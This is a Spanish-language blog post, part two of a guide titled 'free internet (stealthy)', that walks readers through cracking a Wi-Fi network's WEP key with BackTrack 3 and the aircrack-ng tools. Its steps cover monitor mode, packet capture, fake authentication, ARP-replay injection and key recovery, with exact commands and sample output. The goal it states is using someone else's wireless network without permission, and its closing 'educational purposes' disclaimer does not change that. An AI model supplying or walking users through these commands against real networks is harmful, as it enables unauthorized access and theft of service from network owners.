Internet gratis!!! (furtivo) parte 2.

Requisitos previos:

Necesitaremos el Backtrack 3 versión USB:  Descargar desde aqui.
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raiz del pendrive (usb flash memory). Por ejemplo e:

En windows vamos al menu de inicio > ejecutar > cmd

Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos enter.

Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter.
Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al enter).

Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar windows.

Bien, ahora empieza lo divertido…

Enchufamos el pendrive en el puerto usb.

Reiniciamos el pc y cuando salga la pantalla gris con el logo de la PC presionamos la tecla Esc o lo que sea necesario en tu PC para iniciar desde el dispositivo USB .

Nos saldrá un menu azul que nos permitirá seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores).

Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos,  luego es bastante facil.

Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.

PASO 1:

NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.

En una terminal pones:

airmon-ng start wifi0

a continuación:

airodump-ng eth1

cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes

airodump-ng -c [channel] –bssid [AP MAC] -w [filename] eth1

donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.

PASO 2:

Abre una nueva terminal, ya sabes como…

aireplay-ng  –fakeauth 0 -e [AP SSID] -a [AP MAC] eth1

donde:

[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.

Si te sale esto felicidades:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful -)

Si no, intenta con lo siguiente:

Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1

Y te debería salir algo como esto:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful -)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

Si no, olvidate ya que el problema seria que tu tarjeta inalambrica no este diseñada para inyectar paquetes.

Ahora que ya te funciona hay que empezar a inyectar…

PASO 3:

aireplay-ng -3 -b [AP MAC] ath1 -x 250

Ahora vete a la nevera y preparate una botana, ve por una coca-cola y unas aceitunas. En un par de minutos empezarás a ver como la columna DATA de la primera terminal empieza a subir (los números, no es que se mueva de posición ¬¬).

Espera hasta tener unos 40.000 más o menos y abre una tercera terminal.

PASO 4:

Quiero mi clave yaaaa!!!

aircrack-ng -z -b [AP MAC] [filename*.cap]

En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.

Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
y disfruta de tu wifi gratis.

comentale y recuerda esto es para fines educativos By MiGuE bLoG no se hace responsable del uso que le des a esta información.

Cortesia: http://www.asuseeeblog.com

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: